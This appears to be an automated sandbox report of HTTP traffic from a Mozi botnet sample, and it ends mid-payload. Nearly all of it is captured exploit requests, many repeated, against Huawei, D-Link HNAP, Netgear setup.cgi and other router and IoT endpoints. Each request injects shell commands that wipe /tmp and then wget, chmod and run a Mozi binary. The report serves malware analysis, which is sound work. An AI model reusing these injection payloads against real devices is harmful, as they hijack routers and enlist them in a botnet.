                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 70.176.1.46:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 76.236.187.62:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 19.62.64.141:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 20.161.188.142:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 79.53.40.110:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 204.118.69.75:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 185.3.109.165:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 112.161.2.88:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei 